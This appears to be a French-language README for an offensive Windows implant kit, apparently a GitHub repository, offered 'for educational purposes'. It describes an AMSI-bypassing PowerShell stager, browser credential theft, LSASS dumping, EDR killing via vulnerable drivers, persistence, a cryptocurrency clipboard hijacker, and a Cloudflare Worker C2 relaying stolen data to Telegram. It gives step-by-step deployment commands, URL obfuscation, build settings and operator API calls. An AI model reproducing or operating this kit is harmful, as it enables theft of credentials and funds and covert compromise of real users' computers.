
Implant 0day de bout en bout super élitiste. Kill-chain complète. Exploiter, élever les privilèges, pivoter, empoisonner, persister.
@abraxas_null
·
[email protected]
·
abraxaslabs.tech
·
github.com/abraxas/veneficus
Crédit : @YoSoth0
Kit d'implant Windows 10/11 x64 : un stager PowerShell, un PE Rust, et un Cloudflare Worker qui alerte l'opérateur sur Telegram.
Le stager (resources/loader.ps1) est conçu pour faire taire AMSI dans le processus PowerShell courant, récupérer l'implant depuis la route /beacon du Worker, et le lancer sous le nom %TEMP%\MicrosoftEdgeUpdate.exe. Le PE évalue ensuite l'hôte à la recherche d'artefacts de sandbox/analyste. Un score élevé efface le binaire ; un score moyen active le « mode sûr » (empreinte uniquement) ; un score faible exécute la pile complète — patchs AMSI/ETW, un pool BYOVD contre des processus EDR nommés, le vol d'identifiants de navigateur, une chaîne de dump LSASS, la persistance WMI/tâche planifiée/Run, un proxy SOCKS5 localhost, un listener HVNC/RFB localhost, et un clipper de presse-papiers pour les adresses crypto. Une boucle HTTPS avec jitter beacon et interroge un petit ensemble de commandes (/status, /proxy_on, /self_destruct, /re_infect, /sleep, bascules de mode sûr). L'exfiltration utilise AES-256-GCM avec un HMAC, dont la clé provient d'un UUID intégré à la compilation ; le Worker est censé transmettre le texte chiffré sans détenir la clé.
Ce dépôt est publié à des fins d'éducation et d'analyse. Une lecture fichier par fichier de ce qui est implémenté versus simulé se trouve dans VENEFICUS_MINI_v3_DEEP_ANALYSIS.md.
À des fins éducatives uniquement. 2026 Tous droits inversés.
VICTIM MACHINE
loader.ps1 (AMSI/ETW bypass → download → execute)
└── veneficus_mini.exe
├── Environment assessment (sandbox/VM/analyst detection)
├── Stealth: syscall bypass chain, lacuna stack-spoof, DKOM, AMSI/ETW patch
├── BYOVD: kill EDR processes (K7RKScan, ThrottleStop, BdApi, TrueSight, wsftprm, RTCore64)
├── Payload: creds, cookies, LSASS dump, device fingerprint
├── Persistence: WMI / Scheduled Task / Registry (three-way fallback)
├── SOCKS5 proxy (127.0.0.1:1080 by default, configurable)
├── HVNC (127.0.0.1:5900 by default, configurable)
├── Clipper: crypto address hijacking (BTC, ETH, LTC, XMR, DOGE, SOL, XRP, BNB, USDT)
└── C2 loop: AES-GCM encrypted poll every 10 ± 3s (safe mode: 60 ± 18s)
↕ HTTPS
CLOUDFLARE WORKER
/beacon → implant download
/exfil → receive encrypted data → forward ciphertext to Telegram
/commands → return queued commands (one-time queue)
/config → return operator config blob
/admin → queue commands (requires X-Admin-Key)
/register → register UUID (requires X-Admin-Key)
/unregister → revoke UUID (requires X-Admin-Key)
/listing → list all UUIDs (requires X-Admin-Key)
/set_config → push config (requires X-Admin-Key)
↓
TELEGRAM BOT
Receives: ciphertext + nonce + HMAC (operator decrypts offline)
| Composant | Comment installer |
|---|---|
| Rust + cargo | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh |
| Cible de cross-compilation Windows | rustup target add x86_64-pc-windows-gnu |
| Éditeur de liens croisé MinGW | sudo apt install mingw-w64 |
| Wrangler (CLI CF Worker) | npm install -g wrangler |
wrangler login
wrangler init veneficus-relay
# Replace worker.js with cloudflare/worker.js
wrangler secret put TELEGRAM_TOKEN # from @BotFather
wrangler secret put TELEGRAM_CHAT_ID # your chat/group ID
wrangler secret put ADMIN_KEY # random 32-char secret
wrangler kv:namespace create "UUID_KV"
wrangler kv:namespace create "COMMANDS_KV"
wrangler kv:namespace create "CONFIG_KV"
# Add KV bindings to wrangler.toml:
# [[kv_namespaces]]
# binding = "UUID_KV"
# id = "<uuid_kv_id>"
# (repeat for COMMANDS_KV, CONFIG_KV)
wrangler deploy
import base64
url = b"https://your-worker.workers.dev"
key = 0xAF
enc = bytes([b ^ key for b in url])
print(base64.b64encode(enc).decode()) # → set as RELAY_URL_BYTES
RELAY_URL_BYTES="<output_above>" \
BYOVD_DRIVER_DIR="./drivers" \
TOOLS_DIR="./tools" \
cargo build --release --target x86_64-pc-windows-gnu
Placez les fichiers .sys de pilotes vulnérables dans drivers/ et les binaires d'outils dans tools/ avant la compilation.
Lire l'UUID depuis le binaire (intégré à la compilation) :
strings target/x86_64-pc-windows-gnu/release/veneficus_mini.exe | grep -E "[0-9a-f]{8}-[0-9a-f]{4}"
Enregistrer via l'API admin :
curl -X POST https://your-worker.workers.dev/register \
-H "X-Admin-Key: YOUR_ADMIN_KEY" \
-H "Content-Type: application/json" \
-d '{"implant_uuid":"<uuid>","note":"op_blackbird_host01"}'
curl -X POST https://your-worker.workers.dev/set_config \
-H "X-Admin-Key: YOUR_ADMIN_KEY" \
-H "Content-Type: application/json" \
-d '{
"implant_uuid": "global",
"config": {
"clipper_addresses": {
"bitcoin": "bc1qyourwallethere",
"ethereum": "0xYOURWALLETHERE"
},
"reinfect_url": "https://your-worker.workers.dev/beacon"
}
}'
Envoyer via le point de terminaison /admin :
curl -X POST https://your-worker.workers.dev/admin \
-H "X-Admin-Key: YOUR_ADMIN_KEY" \
-H "Content-Type: application/json" \
-d '{"implant_uuid":"<uuid>","command":"/status"}'
| Commande | Effet |
|---|---|
/self_destruct | Effacement 3 passes + purge des journaux d'événements + sortie |
/re_infect | Télécharge une nouvelle charge utile depuis reinfect_url dans la config, se remplace |
/status | Renvoie PID, état du proxy, mode sûr, UUID au C2 |
/proxy_on | Active le proxy SOCKS5 |
/proxy_off | Désactive le proxy SOCKS5 |
/exit_safe | Quitte le mode sûr, reprend le fonctionnement complet |
/enter_safe | Entre en mode sûr (empreinte uniquement) |
/sleep <secs> | Remplace l'intervalle de polling C2 de base |
| Module | Chaîne (gauche = essayé en premier) |
|---|---|
| BYOVD | K7RKScan → BdApiUtil64 → TrueSight → ThrottleStop → STProcessMonitor → wsftprm → RTCore64 → capcom → disable blocklist |
| LSASS | MiniDumpWriteDump (native) → WDigest patch → LSA Whisperer → DumpGuard → PPL bypass (RTCore64) |
| NTLM | PrinterBug → PetitPotam → cross-protocol relay (HTTP→LDAP) → CVE-2025-33073 → MSSQL relay |
| Syscalls | Tartarus Gate → Halo's Gate → ntdll unhook → indirect → standard WinAPI |
| DKOM | EPROCESS unlink → PspChained enumeration → EDR callback unregister |
| Persistence | WMI subscription → Scheduled Task → HKLM Run key |